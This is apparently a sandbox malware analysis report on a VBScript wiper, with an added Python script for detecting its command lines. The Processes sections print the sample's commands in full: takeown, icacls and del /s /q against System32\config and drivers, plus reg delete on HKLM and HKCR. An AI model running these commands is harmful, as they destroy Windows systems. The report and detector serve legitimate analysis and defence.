Malware Analysis Report

2024-11-16 12:53

Sample ID 240815-1j5qnawdrd
Target file01.vbs
SHA256 d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
Tags discovery, exploit
Score 8/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 8/10

SHA256 d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e

Threat Level: Likely malicious

The file file01.vbs was found to be: Likely malicious.

What both detonations record is destructive behaviour: the script spawns cmd.exe to take ownership of, grant Everyone full control over, and recursively delete the contents of C:\Windows\System32\config (the directory holding the registry hive files) and C:\Windows\System32\drivers. The Windows 10 run additionally invokes reg.exe delete against HKCR\*.dll, HKCR\*.exe and HKLM\*. The "Possible privilege escalation attempt" signature fires on the takeown/icacls pair, but here those tools are the destruction primitive rather than an escalation step: takeown requires SeTakeOwnershipPrivilege (the privilege the AdjustPrivilegeToken signature records it enabling), which Administrators hold by default and standard users do not, so on a non-administrative account the chain fails at its first stage. The report does not record whether any deletion succeeded (the "Modifies file permissions" rows carry no indicators), and neither run shows network activity attributable to the sample.

Malicious Activity Summary

Tags discovery, exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry class

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:41

Reported

2024-08-15 21:44

Platform

win7-20240708-en

Max time kernel

117s

Max time network

118s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2156 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2156 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2384 wrote to memory of 2736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2812 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2812 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2812 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2736 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2736 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2736 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2812 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2812 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2812 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2736 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2736 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2736 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2812 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2812 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2812 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs

MD5 fefe72db31bfdbe4a0ae7f11cb852008
SHA1 a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256 d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512 a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0

C:\Users\Admin\Desktop\CompleteSave.vbs

MD5 355d25ae00d82afebe47bffcaa713a40
SHA1 c6790a7e5d81ad3d1149974c75947d3b2509f544
SHA256 93ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
SHA512 08d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa

C:\Users\Admin\Music\WritePop.ogg

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:41

Reported

2024-08-15 21:44

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

155s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1408 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1408 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 3920 wrote to memory of 440 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3920 wrote to memory of 440 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3920 wrote to memory of 4296 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3920 wrote to memory of 4296 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4296 wrote to memory of 3464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4296 wrote to memory of 3464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 440 wrote to memory of 3692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 440 wrote to memory of 3692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 440 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 440 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4296 wrote to memory of 4744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4296 wrote to memory of 4744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3920 wrote to memory of 4824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 4824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.exe

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKLM\*
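
The Processes sections of both detonations list the same three-stage command line twice (once for System32\config, once for System32\drivers), and behavioral2 adds three reg.exe deletions. The following Python script is an added example, not part of the sandbox report or of the sample: it parses those command lines the way a detection engineer would parse a Sysmon Event ID 1 or Security 4688 CommandLine field, splits each cmd /c body into its chained stages, and flags (a) takeown, icacls /grant everyone:(F) and del /s /q against the protected directories, (b) all three against the same path in one command line as a single takeown_grant_delete_chain finding, and (c) reg delete against a hive or class root with a bare or wildcard key. The rule names, the protected-prefix list and the parsing helpers are assumptions of the example; the command lines are copied from the Processes sections above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample input: the command lines listed under Processes in the two
# detonations above (one string per distinct process).
REPORTED_COMMAND_LINES = [
    r'cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"',
    r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"',
    r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1',
    r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1',
    r"takeown /f c:\windows\system32\config\*",
    r"takeown /f c:\windows\system32\drivers\*",
    r"icacls c:\windows\system32\config\* /grant everyone:(f)",
    r"icacls c:\windows\system32\drivers\* /grant everyone:(f)",
    r'"C:\Windows\System32\reg.exe" delete HKCR\*.dll',
    r'"C:\Windows\System32\reg.exe" delete HKCR\*.exe',
    r'"C:\Windows\System32\reg.exe" delete HKLM\*',
]

# Assumed protected prefixes (after the drive letter): System32\config holds the registry
# hive files, System32\drivers the kernel drivers. Extend for your own environment.
PROTECTED_PREFIXES = (r"\windows\system32\config", r"\windows\system32\drivers")
# Registry roots where a bare-root or wildcard-style delete has no legitimate use.
REGISTRY_ROOTS = {"hklm", "hkey_local_machine", "hkcr", "hkey_classes_root", "hku", "hkey_users"}

CMD_WRAPPER = re.compile(r'^\s*(?:"[^"]*cmd(?:\.exe)?"|cmd(?:\.exe)?)\s+/[cCkK]\s+"?(.*?)"?\s*$')
STAGE_SPLIT = re.compile(r"\s*(?:&&|\|\||(?<!>)&|\|)\s*")  # lookbehind keeps 2>&1 intact
REDIRECT = re.compile(r"\s*\d?>\s*(?:&\d|\S+)")             # strips >nul and 2>&1
WIN_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+')
GRANT_EVERYONE_FULL = re.compile(r"/grant(?::r)?\s+(?:everyone|\*s-1-1-0):\(?f\)?", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    target: str
    evidence: str


def split_stages(cmdline: str) -> list[str]:
    """Unwrap 'cmd /c ...' and split the body on cmd.exe chaining operators."""
    m = CMD_WRAPPER.match(cmdline)
    body = m.group(1) if m else cmdline
    return [REDIRECT.sub("", s).strip() for s in STAGE_SPLIT.split(body) if s.strip()]


def tool_name(stage: str) -> str:
    """Lower-cased basename of the stage's first token, without a .exe suffix."""
    first = stage.split(None, 1)[0].strip('"').lower().rsplit("\\", 1)[-1]
    return first[:-4] if first.endswith(".exe") else first


def target_path(stage: str) -> str:
    m = WIN_PATH.search(stage)
    return m.group(0).lower() if m else ""


def is_protected(path: str) -> bool:
    return bool(path) and path[2:].startswith(PROTECTED_PREFIXES)


def classify(stage: str) -> tuple[str, str] | None:
    """Map one stage to (action, target) when it is one of the primitives of interest."""
    tool = tool_name(stage)
    if tool == "takeown":
        return "takeown", target_path(stage)
    if tool == "icacls" and GRANT_EVERYONE_FULL.search(stage):
        return "grant_everyone_full", target_path(stage)
    if tool in ("del", "erase") and re.search(r"\s/s\b", stage, re.I):
        return "del_recursive", target_path(stage)
    if tool == "reg":
        parts = stage.split()
        if len(parts) >= 3 and parts[1].lower() == "delete":
            key = parts[2].strip('"')
            root, _, rest = key.partition("\\")
            if root.lower() in REGISTRY_ROOTS and (not rest or "*" in rest):
                return "reg_delete_wildcard", key
    return None


def analyse(cmdline: str) -> list[Finding]:
    findings: list[Finding] = []
    actions_by_path: dict[str, set[str]] = {}
    for stage in split_stages(cmdline):
        hit = classify(stage)
        if hit is None:
            continue
        action, target = hit
        if action == "reg_delete_wildcard":
            findings.append(Finding(action, target, stage))
        elif is_protected(target):
            findings.append(Finding(f"{action}_on_protected_path", target, stage))
            actions_by_path.setdefault(target, set()).add(action)
    # All three primitives against one path in a single command line is the wiper pattern:
    # take ownership, hand Everyone full control, then delete recursively without prompting.
    for path, actions in actions_by_path.items():
        if {"takeown", "grant_everyone_full", "del_recursive"} <= actions:
            findings.append(Finding("takeown_grant_delete_chain", path, cmdline))
    return findings


def scan(cmdlines: list[str]) -> list[Finding]:
    return [f for c in cmdlines for f in analyse(c)]


if __name__ == "__main__":
    for f in scan(REPORTED_COMMAND_LINES):
        print(f"{f.rule:34} {f.target:36} {f.evidence}")
```

Matching on the chained command line rather than on the individual takeown.exe and icacls.exe processes matters because, as the WriteProcessMemory rows show, each tool runs as a separate child of cmd.exe and in isolation looks like administrative housekeeping; the chain is the signal. Note that reg.exe does not expand wildcards, so reg delete HKLM\* names a key literally called *, and the report only records that reg.exe ran, not whether anything was removed.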

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Apart from the reverse lookups, the only destinations are Microsoft hosts (g.bing.com, tse1.mm.bing.net) reached over TLS, which matches Windows 10 background traffic rather than anything the sample initiated; the Windows 7 run recorded no network activity at all. None of the domains or IPs above should be treated as indicators of compromise.

Files

C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs

MD5 fefe72db31bfdbe4a0ae7f11cb852008
SHA1 a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256 d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512 a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0

C:\Users\Admin\Desktop\desktop.vbs

MD5 355d25ae00d82afebe47bffcaa713a40
SHA1 c6790a7e5d81ad3d1149974c75947d3b2509f544
SHA256 93ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
SHA512 08d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa